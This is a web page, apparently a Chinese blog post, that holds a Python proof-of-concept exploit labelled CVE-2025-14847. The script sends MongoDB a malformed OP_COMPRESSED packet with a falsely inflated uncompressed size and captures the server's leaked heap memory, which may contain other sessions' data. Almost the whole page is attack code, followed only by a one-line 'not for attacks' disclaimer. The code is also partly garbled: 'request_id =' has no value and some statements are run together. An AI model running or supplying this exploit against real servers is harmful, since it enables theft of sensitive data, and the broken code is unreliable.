POC of CVE-2025-14847
import socket
import struct
import zlib
import sys
TARGET_IP = "127.0.0.1"
TARGET_PORT = 27017 def build_malformed_packet():
# 1. 准备一个合法的原始 Payload (通常是 isMaster 或 ping) # OP_QUERY: flags=0, collection="admin.$cmd", skip=0, limit=-1, query={"isMaster": 1} # 这里我们用最简单的 BSON 构造: {"isMaster": 1} # \x13\x00\x00\x00 (doc length) \x10 (int32 type) isMaster\x00 \x01\x00\x00\x00 (value 1) \x00 (term)
bson_payload = b'\x13\x00\x00\x00\x10isMaster\x00\x01\x00\x00\x00\x00' # OP_QUERY 头部: flags(4) + coll_name(cstring) + skip(4) + limit(4) # admin.$cmd\x00
op_query_header = struct.pack('<I', 0) + b'admin.$cmd\x00' + struct.pack('<II', 0, 0xFFFFFFFF)
original_msg = op_query_header + bson_payload
real_uncompressed_size = len(original_msg)
# 2. 压缩 Payload (Zlib) # 我们只压缩那个合法的 op_query 部分
compressed_body = zlib.compress(original_msg)
# 3. 构造恶意的 OP_COMPRESSED 头部 (The Exploit) # Struct: # MsgHeader (16 bytes) # originalOpcode (4 bytes) = 2004 (OP_QUERY) # uncompressedSize (4 bytes) <--- 攻击点 # compressorId (1 byte) = 2 (Zlib) # --- 恶意逻辑 --- # 我们告诉服务器解压后有 10,000 字节,实际上解压出来只有几十字节。 # 服务器会分配 10,000 字节的堆,前几十字节被覆盖,剩下全是内存中的敏感残留数据。
fake_uncompressed_size = 10000 # OP_COMPRESSED 数据部分
op_compressed_data = (
struct.pack('<I', 2004) + # originalOpcode (OP_QUERY)
struct.pack('<I', fake_uncompressed_size) + # MALICIOUS SIZE b'\x02' + # compressorId (Zlib)
compressed_body # Actual compressed data
)
# 4. 计算并添加 MsgHeader # MsgHeader: messageLength, requestID, responseTo, opCode # opCode 2012 = OP_COMPRESSED
total_len = 16 + len(op_compressed_data)
request_id =
header = struct.pack('<iiii', total_len, request_id, 0, 2012)
final_packet = header + op_compressed_data
return final_packet, request_id
def exploit():
print(f"[!] Connecting to {TARGET_IP}:{TARGET_PORT}...")
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
sock.connect((TARGET_IP, TARGET_PORT))
print("[*] Connection established.")
print("[*] Building malformed OP_COMPRESSED packet with Zlib length confusion...")
packet, req_id = build_malformed_packet()
print(f"[*] Sending {len(packet)} bytes...")
sock.sendall(packet)
print("[*] Waiting for server response (leaked memory)...")
# 接收响应头部 (16 bytes)
resp_header = sock.recv(16)
if not resp_header:
print("[-] Connection closed unexpectedly.")
return
resp_len, resp_id, resp_to, resp_opcode = struct.unpack('<iiii', resp_header)
print(f"[+] Header received! Total Length: {resp_len}, OpCode: {resp_opcode}")
# 接收剩余的数据 (Payload) # 这部分数据里包含了我们要的 Heap Memory Leak
leaked_data = b''
remaining = resp_len - 16 while remaining > 0:
chunk = sock.recv(min(4096, remaining))
if not chunk: break
leaked_data += chunk
remaining -= len(chunk)
print(f"[+] Successfully captured {len(leaked_data)} bytes of data.")
print("-" * 50)
# 简单打印一部分可能泄露的字符串 (ASCII) # 注意:这里混杂着二进制和文本,可能是别的会话的残留
printable = ''.join([chr(b) if 32 <= b <= 126 else '.' for b in leaked_data])
print("Raw Memory Dump Preview (Last 500 bytes):")
print(printable[-500:])
print("-" * 50)
sock.close()
except Exception as e:
print(f"[-] Error: {e}")
if __name__ == "__main__":
exploit()
禁止用于攻击
评论区(暂无评论)